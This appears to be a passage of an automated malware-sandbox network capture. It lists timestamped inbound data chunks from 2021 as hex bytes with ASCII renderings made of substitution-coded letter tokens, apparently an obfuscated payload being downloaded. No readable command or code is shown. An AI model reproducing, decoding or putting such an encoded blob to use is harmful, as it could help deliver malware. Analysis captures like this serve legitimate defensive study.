                                                            2021-10-29 18:10:39 UTC33INData Raw: 71 44 20 71 71 58 20 44 6d 20 6d 58 20 6d 58 20 70 45 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 4f 20 71 4f 4d 20 71 71 4a 20 70 57 20 57 4f 20 45 70 20 57 4a 20 58 6d 20 71 71 6d 20 71 71 70 20 71 71 4f 20 70 71 20 57 6d 20 6d 4d 20 57 4f 20 6d 58 20 44 45 20 71 4a 4f 20 71 45 71 20 71 4f 6d 20 58 44 20 70 44 20 57 58 20 4a 70 44 20 57 6d 20 58 4a 20 58 58 20 71 71 45 20 71 4f 58 20 4d 44 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4f 71 20 71 4a 57 20 71 71 4a 20 57 57 20 44 70 20 57 4f 20 57 6d 20 58 57 20 71 4f 57 20 44 4d 20 71 71 71 20 71 71 4a 20 4a 4f 20 6d 58 20 57 4f 20 57 6d 20 45 4d 20 71 71 6d 20 71 71 45 20 71 4a 6d 20 71 71 57 20 44 57 20 4d 71 20 57 71 20 57 6d 20 58 4a 20 70 57 20 71 71 58 20 71 71 71 20 71 71 20 6d 58 20
                                                            Data Ascii: qD qqX Dm mX mX pE Wm Xm qqm qqO qOM qqJ pW WO Ep WJ Xm qqm qqp qqO pq Wm mM WO mX DE qJO qEq qOm XD pD WX JpD Wm XJ XX qqE qOX MD WO mX WO Wm Xm qqm qOq qJW qqJ WW Dp WO Wm XW qOW DM qqq qqJ JO mX WO Wm EM qqm qqE qJm qqW DW Mq Wq Wm XJ pW qqX qqq qq mX
                                                            2021-10-29 18:10:39 UTC34INData Raw: 20 71 4a 45 20 71 45 4d 20 71 71 45 20 4a 4f 20 70 58 20 57 44 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57 20 71 4f 4d 20 71 71 4a 20 57 71 20 70 4a 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 4a 45 20 44 71 20 6d 58 20 57 57 20 57 45 20 58 6d 20 71 71 6d 20 71 71 44 20 71 71 58 20 44 6d 20 6d 58 20 6d 58 20 70 44 20 57 6d 20 58 6d 20 71 71 6d 20 71 4f 57 20 71 4f 4d 20 71 71 4a 20 70 57 20 57 4f 20 45 70 20 57 4a 20 58 6d 20 71 71 6d 20 71 71 70 20 71 71 4f 20 70 71 20 44 70 20 6d 4d 20 57 4f 20 6d 58 20 4d 6d 20 71 45 4a 20 71 71 4a 20 45 57 20 71 4f 4a 20 57 44 20 4a 70 58 20 57 4f 20 6d 58 20 71 4a 44 20 71 71 6d 20 71 71 45 20 71 4f 58 20 4d 44 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4a 4a 20 4d 58 20 71
                                                            Data Ascii: qJE qEM qqE JO pX WD JpJ Xm qqD MW qOM qqJ Wq pJ WO Wm Xm qqm qqE qOM qJE Dq mX WW WE Xm qqm qqD qqX Dm mX mX pD Wm Xm qqm qOW qOM qqJ pW WO Ep WJ Xm qqm qqp qqO pq Dp mM WO mX Mm qEJ qqJ EW qOJ WD JpX WO mX qJD qqm qqE qOX MD WO mX WO Wm Xm qqm qJJ MX q
                                                            2021-10-29 18:10:39 UTC36INData Raw: 4d 20 71 71 4a 20 71 6d 20 71 71 71 20 71 71 4a 20 57 4f 20 57 4a 20 6d 4d 20 58 4d 20 4d 6d 20 71 71 57 20 71 71 45 20 71 4f 45 20 71 4a 4a 20 4a 70 44 20 57 70 20 4a 4f 20 70 4a 20 4d 6d 20 71 45 4a 20 71 71 45 20 71 4f 45 20 4d 4f 20 57 4f 20 6d 58 20 57 71 20 70 58 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 44 70 20 44 71 20 57 6d 20 58 71 20 71 4a 57 20 71 71 45 20 71 4f 4d 20 71 71 70 20 6d 71 20 4f 20 6d 58 20 57 6d 20 44 44 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 4f 58 20 57 4f 20 6d 58 20 70 57 20 57 4a 20 6d 45 20 71 71 4a 20 71 71 45 20 71 4f 4d 20 71 71 44 20 6d 4d 20 4d 57 20 70 58 20 57 57 20 58 6d 20 71 71 44 20 71 4a 45 20 71 45 4d 20 71 71 45 20 4a 4f 20 70 58 20 57 44 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57
                                                            Data Ascii: M qqJ qm qqq qqJ WO WJ mM XM Mm qqW qqE qOE qJJ JpD Wp JO pJ Mm qEJ qqE qOE MO WO mX Wq pX Xm qqm qqE qOM qqJ WO Dp Dq Wm Xq qJW qqE qOM qqp mq O mX Wm DD qqm qqE qOM qOX WO mX pW WJ mE qqJ qqE qOM qqD mM MW pX WW Xm qqD qJE qEM qqE JO pX WD JpJ Xm qqD MW
                                                            2021-10-29 18:10:39 UTC37INData Raw: 6d 58 20 57 4f 20 57 6d 20 44 4d 20 4d 4d 20 71 71 45 20 71 4f 6d 20 71 4a 45 20 57 4f 20 6d 58 20 57 71 20 71 4a 20 58 44 20 71 4f 71 20 4a 44 20 70 44 20 71 71 4a 20 57 4f 20 57 6d 20 6d 58 20 70 4f 20 71 4d 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 4f 20 57 4f 20 70 57 20 4a 20 57 4a 20 58 6d 20 57 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 45 20 4d 6d 20 6d 4d 20 71 71 71 20 71 71 20 6d 58 20 6d 58 20 57 4f 20 57 4f 20 71 4a 4f 20 45 58 20 71 71 4d 20 4a 4a 20 71 71 6d 20 57 4f 20 6d 58 20 57 6d 20 44 45 20 4a 71 57 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 70 71 20 57 71 20 4a 4f 20 4a 4d 20 58 71 20 4a 4d 20 4a 70 45 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4f 20 45 70 20 57 4a 20 58 6d 20 71 71 6d 20 71
                                                            Data Ascii: mX WO Wm DM MM qqE qOm qJE WO mX Wq qJ XD qOq JD pD qqJ WO Wm mX pO qMW qqm qqE qOp MO WO pW J WJ Xm WX qqE qOM qqJ WO mX WO Wm XE Mm mM qqq qq mX mX WO WO qJO EX qqM JJ qqm WO mX Wm DE JqW qqm qqE qOX XW pq Wq JO JM Xq JM JpE qOM qqJ WD WO Ep WJ Xm qqm q
                                                            2021-10-29 18:10:39 UTC38INData Raw: 6d 20 58 4a 20 4d 6d 20 71 57 44 20 71 4f 4f 20 4d 4d 20 57 57 20 70 6d 20 57 57 20 44 4d 20 4a 71 44 20 71 71 57 20 71 71 45 20 71 4f 45 20 58 58 20 71 6d 70 20 6d 4d 20 57 4f 20 6d 58 20 45 4f 20 71 71 4d 20 4d 45 20 44 4d 20 71 58 70 20 57 71 20 6d 58 20 57 4a 20 44 4d 20 71 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 4d 20 57 4a 20 70 6d 20 57 57 20 44 58 20 71 58 4a 20 71 71 45 20 71 71 45 20 4a 4d 20 58 58 20 71 6d 71 20 6d 4d 20 57 4f 20 6d 58 20 71 4a 45 20 71 4f 44 20 71 71 57 20 4a 20 44 6d 20 57 4f 20 6d 58 20 57 4a 20 4a 45 20 58 4a 20 71 20 4a 71 70 20 71 4f 4d 20 71 71 4a 20 57 44 20 45 6d 20 71 58 20 4a 4a 4a 20 58 45 20 71 71 6d 20 71 71 45 20 44 4d 20 4a 70 4d 20 57 4f 20 6d 58 20 57 44 20 6d 58 20 44 4d 20 71 71 4d 20 71 4f 70 20 71
                                                            Data Ascii: m XJ Mm qWD qOO MM WW pm WW DM JqD qqW qqE qOE XX qmp mM WO mX EO qqM ME DM qXp Wq mX WJ DM qMm qqm qqE qOp MM WJ pm WW DX qXJ qqE qqE JM XX qmq mM WO mX qJE qOD qqW J Dm WO mX WJ JE XJ q Jqp qOM qqJ WD Em qX JJJ XE qqm qqE DM JpM WO mX WD mX DM qqM qOp q
                                                            2021-10-29 18:10:39 UTC40INData Raw: 4a 20 57 4a 20 71 6d 44 20 4a 70 20 6d 45 20 44 6d 20 71 6d 4f 20 71 71 57 20 57 6d 20 71 71 4a 20 57 4f 20 57 6d 20 44 57 20 71 58 70 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 4f 45 20 58 57 20 6d 4f 20 70 44 20 4a 4f 6d 20 6d 58 20 58 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 4f 20 6d 58 20 4a 6d 44 20 58 45 20 71 71 4f 20 71 4a 71 20 71 6d 4a 20 57 4a 20 71 4f 4d 20 57 4f 20 57 6d 20 58 4a 20 71 20 4a 6d 6d 20 71 4f 4d 20 71 71 4a 20 57 4a 20 71 6d 44 20 4a 70 20 6d 4a 20 44 6d 20 71 6d 4f 20 71 71 57 20 57 4f 20 71 71 4a 20 57 4f 20 57 6d 20 44 57 20 71 58 70 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 4f 45 20 58 57 20 6d 45 20 70 44 20 4a 4f 6d 20 6d 58 20 57 4a 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57
                                                            Data Ascii: J WJ qmD Jp mE Dm qmO qqW Wm qqJ WO Wm DW qXp Xm qqm qqW JOE XW mO pD JOm mX X qqm qqE qOE p qEM mX WO mX JmD XE qqO qJq qmJ WJ qOM WO Wm XJ q Jmm qOM qqJ WJ qmD Jp mJ Dm qmO qqW WO qqJ WO Wm DW qXp Xm qqm qqW JOE XW mE pD JOm mX WJ qqm qqE qOE p qEM mX W
                                                            2021-10-29 18:10:39 UTC41INData Raw: 4f 20 6d 58 20 71 71 70 20 71 20 4a 71 4f 20 71 4f 4d 20 71 71 4a 20 57 44 20 4d 57 20 4d 70 20 57 57 20 58 6d 20 71 71 44 20 58 4f 20 70 4f 20 71 4f 57 20 57 4f 20 6d 58 20 57 44 20 58 4d 20 70 57 20 71 71 57 20 71 71 45 20 71 4f 45 20 58 57 20 44 57 20 44 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 71 4a 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 71 20 44 57 20 71 57 58 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 4a 57 71 20 57 71 20 6d 58 20 57 4a 20 71 4d 20 70 4d 20 4a 71 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4d 70 20 45 4d 20 57 71 20 57 6d 20 58 4a 20 58 45 20 44 20 71 4d 44 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 45 45 20 58 57 20 71 71 6d 20 71 71 57 20 45 4a 20 70 20 71 57 6d 20 6d 58 20 57 4f 20 44 4f 20 57 4d 20 4a 57 71 20 71 71 44 20 71 4f 4d 20
                                                            Data Ascii: O mX qqp q JqO qOM qqJ WD MW Mp WW Xm qqD XO pO qOW WO mX WD XM pW qqW qqE qOE XW DW D WO Wm Mm JM qJ qOX qqJ WJ Jq DW qWX Xm qqm qJE J JWq Wq mX WJ qM pM JqX qqE qOM qJJ Mp EM Wq Wm XJ XE D qMD qqJ WO WX Mp EE XW qqm qqW EJ p qWm mX WO DO WM JWq qqD qOM
                                                            2021-10-29 18:10:39 UTC42INData Raw: 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 71 57 20 6d 4d 20 57 4f 20 57 6d 20 4a 4a 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 45 20 57 4f 20 6d 58 20 57 4f 20 57 45 20 58 6d 20 71 71 6d 20 71 71 44 20 71 71 58 20 44 6d 20 6d 4d 20 6d 58 20 58 4f 20 57 6d 20 58 6d 20 71 71 6d 20 58 57 20 71 4f 4d 20 71 71 4a 20 70 57 20 6d 45 20 6d 44 20 70 4f 20 44 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4a 20 71 4a 4a 20 57 44 20 57 4f 20 45 4f 20 71 4a 6d 20 45 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 57 44 20 57 6d 20 4a 44 20 71 57 6d 20 58 6d 20 71 71 6d 20 71 4a 45 20 44 57 20 45 4f 20 57 4a 20 44 45 20 58 44 20 57 6d 20 58 6d 20 71 4a 4f 20 4d 70 20 71 4d 4a 20 71 71 4a 20 57 4f 20 57 58 20 4a 44 20 71 71 44 20 58 6d 20 71 71 6d 20 71 4a 45
                                                            Data Ascii: Xm qqm qqE qOM qqJ qqW mM WO Wm JJ qqW qqE qOM qqE WO mX WO WE Xm qqm qqD qqX Dm mM mX XO Wm Xm qqm XW qOM qqJ pW mE mD pO D qqm qqE qOp J qJJ WD WO EO qJm EW qqE qOM qJJ WD Wm JD qWm Xm qqm qJE DW EO WJ DE XD Wm Xm qJO Mp qMJ qqJ WO WX JD qqD Xm qqm qJE
                                                            2021-10-29 18:10:39 UTC44INData Raw: 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 71 70 44 20 57 4f 20 57 6d 20 4d 6d 20 4d 4f 20 4a 4f 6d 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 6d 20 71 70 44 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 6d 57 20 71 4f 44 20 71 71 70 20 57 4f 20 57 4a 20 45 44 20 6d 4d 20 58 57 20 71 71 6d 20 71 71 70 20 4a 4a 20 4a 4f 70 20 57 4f 20 6d 58 20 57 44 20 45 4a 20 58 70 20 71 71 57 20 71 71 45 20 71 4f 57 20 71 6d 20 57 4a 20 6d 4d 20 57 4f 20 57 4f 20 71 4a 71 20 44 44 20 4d 4d 20 70 71 20 4a 4a 20 57 58 20 6d 58 20 44 44 20 70 6d 20 71 70 4a 20 71 4a 44 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 71 70 44 20 57 4f 20 57 6d 20 4d 6d 20 71 4f 71 20 4a 6d 58 20 4a 4a 6d 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 70 4a 20 44 44 20 71 4f 4a 20 4d 70 20 4a 4f 4d 20 71 71
                                                            Data Ascii: qqE qOM qqm JD qpD WO Wm Mm MO JOm qOM qqJ WD Jm qpD Wm Xm qJO JmW qOD qqp WO WJ ED mM XW qqm qqp JJ JOp WO mX WD EJ Xp qqW qqE qOW qm WJ mM WO WO qJq DD MM pq JJ WX mX DD pm qpJ qJD qqE qOM qqm JD qpD WO Wm Mm qOq JmX JJm qqJ WO mM Jp pJ DD qOJ Mp JOM qq
                                                            2021-10-29 18:10:39 UTC45INData Raw: 58 20 6d 58 20 71 71 44 20 57 6d 20 45 4a 20 71 44 20 71 71 45 20 4d 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 58 44 20 4d 4f 20 71 45 71 20 71 4f 4d 20 71 71 4a 20 57 4a 20 4d 57 20 4d 20 57 6d 20 58 6d 20 71 71 44 20 58 4f 20 71 71 45 20 44 45 20 57 58 20 57 4f 20 6d 4d 20 57 4f 20 71 4a 6d 20 6d 70 20 71 71 45 20 71 4f 4d 20 71 71 58 20 6d 70 20 70 20 57 4a 20 44 4d 20 4a 57 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 71 4f 20 4a 6d 20 71 58 4a 20 6d 58 20 70 4f 20 71 58 70 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 71 20 71 6d 20 6d 58 20 57 4f 20 6d 58 20 71 71 70 20 71 4f 44 20 45 4f 20 71 4f 71 20 71 71 6d 20 6d 4d 20 57 4a 20 4a 44 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 57 20 71 71 44 20 44 45 20 57 4a 20 44 45 20 71 57 70 20 57 6d
                                                            Data Ascii: X mX qqD Wm EJ qD qqE MM qqJ WO mX WO qED XD MO qEq qOM qqJ WJ MW M Wm Xm qqD XO qqE DE WX WO mM WO qJm mp qqE qOM qqX mp p WJ DM JWW qqm qqE qOp qO Jm qXJ mX pO qXp qqm qqE qOE pq qm mX WO mX qqp qOD EO qOq qqm mM WJ JD qOX Xm qqm qqW qqD DE WJ DE qWp Wm
                                                            2021-10-29 18:10:39 UTC46INData Raw: 57 20 71 71 45 20 71 4f 45 20 58 58 20 71 58 4d 20 6d 58 20 57 4f 20 6d 58 20 57 4d 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 58 20 4a 70 20 6d 4f 20 71 20 44 4a 20 58 44 20 71 71 70 20 71 71 70 20 44 4d 20 71 45 20 57 4f 20 6d 58 20 57 4a 20 6d 45 20 71 4f 70 20 71 71 44 20 44 20 71 4d 58 20 71 71 4a 20 57 4f 20 57 58 20 45 4a 20 4a 58 20 4a 6d 4a 20 71 71 70 20 4a 44 20 57 44 20 71 71 70 20 57 4f 20 57 6d 20 70 4f 20 4a 4a 20 58 44 20 4d 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 4a 20 57 4a 20 4d 57 20 71 71 20 57 6d 20 58 6d 20 71 71 44 20 58 4f 20 71 71 45 20 44 45 20 57 58 20 57 4f 20 6d 4d 20 57 4f 20 71 4a 6d 20 71 44 20 71 71 45 20 71 4f 4d 20 71 71 58 20 6d 70 20 70 20 57 4a 20 44 4d 20 4a 57 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 71 4f 20 4a 6d 20
                                                            Data Ascii: W qqE qOE XX qXM mX WO mX WM mX qqE qOM qqX Jp mO q DJ XD qqp qqp DM qE WO mX WJ mE qOp qqD D qMX qqJ WO WX EJ JX JmJ qqp JD WD qqp WO Wm pO JJ XD MO qJm qOM qqJ WJ MW qq Wm Xm qqD XO qqE DE WX WO mM WO qJm qD qqE qOM qqX mp p WJ DM JWW qqm qqE qOp qO Jm
                                                            2021-10-29 18:10:39 UTC48INData Raw: 20 71 4f 4d 20 71 71 58 20 57 44 20 6d 45 20 44 71 20 71 58 45 20 4d 4f 20 71 71 6d 20 71 71 45 20 71 71 71 20 58 57 20 70 44 20 70 44 20 4a 4f 6d 20 6d 58 20 70 58 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 4f 20 6d 58 20 4a 6d 44 20 58 45 20 4d 58 20 71 4a 71 20 71 6d 4a 20 57 4a 20 44 45 20 57 4f 20 57 6d 20 58 4a 20 71 20 4a 6d 6d 20 71 4f 4d 20 71 71 4a 20 57 4a 20 71 6d 44 20 4a 70 20 6d 44 20 44 6d 20 71 6d 4f 20 71 71 57 20 4a 57 20 71 71 4a 20 57 4f 20 57 6d 20 44 57 20 71 58 70 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 4f 45 20 58 57 20 6d 70 20 70 44 20 4a 4f 6d 20 6d 58 20 70 70 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 4f 20 6d 58 20 4a 6d 44 20 58 45 20 71 71 71 20 71 4a 71 20 71 6d 4a 20 57
                                                            Data Ascii: qOM qqX WD mE Dq qXE MO qqm qqE qqq XW pD pD JOm mX pX qqm qqE qOE p qEM mX WO mX JmD XE MX qJq qmJ WJ DE WO Wm XJ q Jmm qOM qqJ WJ qmD Jp mD Dm qmO qqW JW qqJ WO Wm DW qXp Xm qqm qqW JOE XW mp pD JOm mX pp qqm qqE qOE p qEM mX WO mX JmD XE qqq qJq qmJ W
                                                            2021-10-29 18:10:39 UTC49INData Raw: 20 57 70 20 57 4f 20 57 4f 20 6d 58 20 70 4d 20 4a 71 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 70 4a 20 57 4f 20 57 6d 20 71 4a 45 20 4d 4f 20 71 4f 4f 20 71 4f 4d 20 71 71 4a 20 4a 57 20 4a 6d 20 71 58 44 20 57 6d 20 58 6d 20 71 71 44 20 4d 57 20 45 57 20 71 71 57 20 57 6d 20 57 70 20 4a 44 20 4d 57 20 58 6d 20 71 71 6d 20 71 71 57 20 45 71 20 71 71 4a 20 57 4f 20 6d 70 20 4a 20 57 4f 20 58 6d 20 58 45 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 57 20 6d 58 20 57 4f 20 70 4d 20 58 4f 20 71 20 4a 6d 4d 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 71 20 44 57 20 71 6d 57 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 70 71 20 57 71 20 6d 58 20 57 4a 20 71 4d 20 70 4d 20 71 4f 45 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4d 70 20 45 71 20 57 71 20 57 6d 20 58 4a
                                                            Data Ascii: Wp WO WO mX pM JqW qqE qOM qJJ JD pJ WO Wm qJE MO qOO qOM qqJ JW Jm qXD Wm Xm qqD MW EW qqW Wm Wp JD MW Xm qqm qqW Eq qqJ WO mp J WO Xm XE qqD qOM qqJ mW mX WO pM XO q JmM qOX qqJ WJ Jq DW qmW Xm qqm qJE J pq Wq mX WJ qM pM qOE qqE qOM qJJ Mp Eq Wq Wm XJ
                                                            2021-10-29 18:10:39 UTC50INData Raw: 57 6d 20 45 70 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 6d 58 20 57 4f 20 71 58 20 58 6d 20 71 71 6d 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4f 6d 20 71 4f 58 20 71 71 4a 20 57 4f 20 6d 44 20 57 71 20 57 6d 20 58 6d 20 71 71 4d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 44 71 20 6d 58 20 57 4f 20 57 57 20 45 4d 20 44 44 20 71 71 58 20 71 4f 4d 20 71 58 20 57 4f 20 6d 58 20 57 4f 20 4a 4a 20 58 6d 20 71 71 6d 20 71 4f 4f 20 71 71 6d 20 71 4f 58 20 4a 44 20 4d 58 20 57 4f 20 57 6d 20 4d 6d 20 4f 20 44 71 20 71 4f 71 20 71 71 4a 20 44 44 20 4a 6d 20 71 71 20 57 6d 20 58 6d 20 71 4a 4f 20 71 4a 45 20 71 4f 45 20 58 58 20 71 57 58 20 6d 58 20 57 4f 20 44 4f 20 71 4a 4f 20 44 58 20 71 71
                                                            Data Ascii: Wm Ep qqW qqE qOM qqp WO mX WO qX Xm qqm qqD qOM qqJ WO mX WO Wm Xm qqm qOm qOX qqJ WO mD Wq Wm Xm qqM qqE qOM qqJ Dq mX WO WW EM DD qqX qOM qX WO mX WO JJ Xm qqm qOO qqm qOX JD MX WO Wm Mm O Dq qOq qqJ DD Jm qq Wm Xm qJO qJE qOE XX qWX mX WO DO qJO DX qq
                                                            2021-10-29 18:10:39 UTC52INData Raw: 20 57 4f 20 57 6d 20 58 57 20 4d 4f 20 4a 4f 57 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 4a 6d 20 44 70 20 57 6d 20 58 6d 20 71 71 4a 20 4d 70 20 4a 71 70 20 71 71 4a 20 57 4f 20 57 58 20 4a 44 20 71 6d 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 44 4d 20 4a 4f 4a 20 57 4f 20 6d 58 20 57 44 20 71 58 4a 20 4d 6d 20 71 71 57 20 71 71 45 20 71 4f 57 20 71 6d 20 57 44 20 6d 4d 20 57 4f 20 57 4f 20 6d 45 20 4a 4f 71 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 45 44 20 57 58 20 57 71 20 57 6d 20 58 4f 20 71 4a 20 71 4a 6d 20 71 4f 58 20 71 71 4a 20 57 6d 20 4a 4d 20 4a 20 70 4a 20 70 58 20 4a 4f 20 71 4a 57 20 71 4f 4d 20 4f 20 70 58 20 4a 4a 6d 20 44 70 20 57 6d 20 58 6d 20 71 71 4a 20 4d 70 20 4a 71 70 20 71 71 4a 20 57 4f 20 57 58 20 70 45 20 71 58 45 20 4a 71 45 20 71
                                                            Data Ascii: WO Wm XW MO JOW qOM qqJ WD JJm Dp Wm Xm qqJ Mp Jqp qqJ WO WX JD qmp Xm qqm qJE DM JOJ WO mX WD qXJ Mm qqW qqE qOW qm WD mM WO WO mE JOq qqE qOM qJJ ED WX Wq Wm XO qJ qJm qOX qqJ Wm JM J pJ pX JO qJW qOM O pX JJm Dp Wm Xm qqJ Mp Jqp qqJ WO WX pE qXE JqE q
                                                            2021-10-29 18:10:39 UTC53INData Raw: 6d 20 71 4a 70 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 71 44 20 57 4f 20 71 4a 6d 20 4a 4f 44 20 71 71 44 20 71 4f 4d 20 71 71 58 20 4a 44 20 4a 70 58 20 57 4f 20 57 6d 20 58 4a 20 4a 4d 20 71 6d 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 44 20 71 71 44 20 57 4f 20 71 4a 6d 20 4a 4f 44 20 71 71 44 20 71 4f 4d 20 71 71 58 20 4a 44 20 4a 71 71 20 57 4f 20 57 6d 20 58 4a 20 4a 4d 20 6d 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 44 20 44 58 20 57 4f 20 71 4a 6d 20 4a 4f 44 20 71 71 44 20 71 4f 4d 20 71 71 58 20 4a 44 20 4a 4f 4d 20 57 4f 20 57 6d 20 58 4a 20 58 45 20 58 58 20 71 4f 57 20 58 44 20 70 58 20 4a 45 20 57 57 20 70 4f 20 45 4f 20 71 71 6d 20 71 71 45 20 45 4f 20 70 71 20 4d 57 20 6d 4d 20 57 4f 20 6d 58 20 71 4a 44 20 57 4a 20 71 71 70 20 44 4d 20
                                                            Data Ascii: m qJp qOM qqJ WO mX qqD WO qJm JOD qqD qOM qqX JD JpX WO Wm XJ JM qm qOX qqJ WJ JD qqD WO qJm JOD qqD qOM qqX JD Jqq WO Wm XJ JM m qOX qqJ WJ JD DX WO qJm JOD qqD qOM qqX JD JOM WO Wm XJ XE XX qOW XD pX JE WW pO EO qqm qqE EO pq MW mM WO mX qJD WJ qqp DM
                                                            2021-10-29 18:10:39 UTC57INData Raw: 44 20 71 70 58 20 71 71 6d 20 71 4f 4f 20 71 4f 44 20 71 4f 70 20 71 4f 44 20 70 57 20 57 70 20 70 4d 20 58 70 20 4d 4d 20 71 71 57 20 4a 4a 45 20 4a 57 20 4f 20 71 6d 44 20 4a 70 44 20 57 70 20 71 71 6d 20 71 45 4a 20 71 71 45 20 71 4a 6d 20 71 71 44 20 4d 70 20 44 4f 20 57 4f 20 57 6d 20 4d 6d 20 45 4a 20 6d 71 20 71 6d 44 20 71 6d 70 20 4a 4f 57 20 4a 70 58 20 44 4a 20 70 4d 20 58 4f 20 4d 6d 20 71 71 6d 20 71 4a 6d 20 71 71 44 20 4d 70 20 57 4d 20 57 4f 20 57 6d 20 4d 6d 20 71 45 6d 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 58 20 70 70 20 71 4a 20 71 4a 44 20 71 4a 57 20 71 4f 44 20 4a 57 6d 20 4d 71 20 71 57 20 4a 4f 20 4a 4f 71 20 71 45 71 20 71 6d 71 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 4a 20 4a 58 20 58 57
                                                            Data Ascii: D qpX qqm qOO qOD qOp qOD pW Wp pM Xp MM qqW JJE JW O qmD JpD Wp qqm qEJ qqE qJm qqD Mp DO WO Wm Mm EJ mq qmD qmp JOW JpX DJ pM XO Mm qqm qJm qqD Mp WM WO Wm Mm qEm qEq qqO XD JpD mX WX pp qJ qJD qJW qOD JWm Mq qW JO JOq qEq qmq qEq qqO XD JpD mX WJ JX XW
                                                            2021-10-29 18:10:39 UTC61INData Raw: 20 4a 4a 6d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4a 70 20 4a 44 20 71 4a 20 71 58 4a 20 57 4f 20 57 6d 20 58 6d 20 4d 4d 20 71 4f 4f 20 4a 20 71 44 44 20 57 4f 20 6d 58 20 57 44 20 70 4d 20 4d 4a 20 44 44 20 71 6d 20 71 4f 44 20 58 4f 20 57 4f 20 6d 58 20 71 58 20 57 70 20 44 4a 20 4d 70 20 45 20 71 4a 6d 20 4d 45 20 4d 70 20 71 4d 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 58 71 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 4d 20 71 4d 71 20 71 71 4f 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 4f 4a 20 6d 4a 20 71 58 4d 20 71 4f 6d 20 57 6d 20 58 6d 20 71 71 57 20 58 4f 20 71 4a 70 20 71 71 71 20 58 20 71 45 70 20 4a 70 20 70 70 20 45 57 20 6d 44 20 4a 70 4a 20 70 4f 20 45 4a 20 57 4f 20 6d 58 20 57 44 20 71 6d 58 20 44 45 20 4a 4d 20 57 4d 20 71 4f 4d 20 71
                                                            Data Ascii: JJm Xm qqm qJE qJp JD qJ qXJ WO Wm Xm MM qOO J qDD WO mX WD pM MJ DD qm qOD XO WO mX qX Wp DJ Mp E qJm ME Mp qM WO Wm Mm JM Xq qOM qqJ WD pM qMq qqO Xm qqm qqD EJ qOJ mJ qXM qOm Wm Xm qqW XO qJp qqq X qEp Jp pp EW mD JpJ pO EJ WO mX WD qmX DE JM WM qOM q
